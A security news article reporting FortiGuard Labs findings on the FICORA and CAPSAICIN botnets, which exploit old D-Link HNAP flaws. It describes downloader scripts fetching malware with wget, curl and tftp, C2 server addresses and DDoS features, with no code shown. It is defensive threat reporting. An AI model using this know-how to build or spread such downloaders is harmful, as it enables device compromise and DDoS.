Researchers observed increased activity from Mirai variant “FICORA” and Kaiten variant “CAPSAICIN” botnets in late 2024 that exploited known vulnerabilities in D-Link devices, such as CVE-2024-33112, leveraging the HNAP protocol to execute malicious commands remotely, highlighting the continued risk of unpatched legacy devices.
IPS telemetry reveals the persistent spread of “FICORA” and “CAPSAICIN” botnets through the exploitation of reused older attacks, while analysis of infected traffic provides insights into the operational characteristics and attack vectors employed by these botnets.
The “FICORA” botnet originated from two servers (185.191.126.213 and 185.191.126.248) located in the Netherlands, as this widespread attack, likely not targeted, indicates the botnet’s global reach and potential for significant impact.
The “CAPSAICIN” botnet, unlike “FICORA,” exhibited a brief but intense period of activity on October 21-22, 2024, where attackers primarily targeted East Asian countries, actively disseminating the “CAPSAICIN” botnet across the region.
FICORA botnet deploys a shell script named “multi” to download the malware by utilizing various methods, including wget, ftpget, curl, and tftp, to acquire the necessary components for the botnet’s operation.
The downloader script targets various Linux architectures and kills processes with the same extension as the malware “FICORA,” and then downloads and executes malware encoded with ChaCha20 by leveraging the architecture information.
It is a Mirai variant, which employs hardcoded credentials for brute-force attacks, embeds a shell script to kill competing malware (“dvrHelper”), and leverages UDP, TCP, and DNS protocols for DDoS attacks.
The downloader script “bins.sh” retrieves and executes the “CAPSAICIN” malware targeting various Linux architectures, where the malware variant name is revealed upon execution through a pop-up displaying “CAPSAICIN.”
“CAPSAICIN” malware establishes a connection with its C2 server, sending victim host information, then awaits commands from the C2 server, which it executes, and also uses the “PRIVMSG” function to set environment variables, enabling the C2 server to remotely control the compromised system.
It is likely a variant of the Keksec group’s botnet and leverages the “PRIVMSG” function to execute DDoS attacks via commands received from a C2 server, which along with accompanying help messages, enable the malware to perform various attack functions, suggesting its development was influenced by version 17.0.0 of the Keksec group’s botnet.
FortiGuard Labs identified “FICORA” and “CAPSAICIN,” leveraging decade-old kernel vulnerabilities, while despite patches, these attacks persist globally and to mitigate these risks, enterprises must proactively update kernels and implement robust monitoring to prevent malware exploitation through these vulnerabilities.
![Pinterest](https://pinterest.com/pin/create/button/?url=https://cyberpress.org/new-botnet-exploits-d-link-routers/&media=https://i1.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjb-z1hc4_qT06hwo9fShAY0RJqJzix80BlHdJoOovHzNRbCIIE4y4iiKtI1m9zxYlylfrIdrv1-GmFiU6-1R9t1CN3zBk_WsqKZisrrbJjMJFl0aYy9h0skzxiWBvA82jGT_30lchLXiDsJK_x4XRmwWbKFFiOkzNw_OyN2BN4pgLcP0uTMoOWmeYkRkIH/s16000/New%20Botnet%20Exploits%20D-Link%20Routers%20for%20Remote%20Control.webp?w=1200&resize=1200,0&ssl=1&description=Researchers observed increased activity from Mirai variant "FICORA" and Kaiten variant "CAPSAICIN" botnets in late 2024 that exploited known vulnerabilities in D-Link devices){kind=link}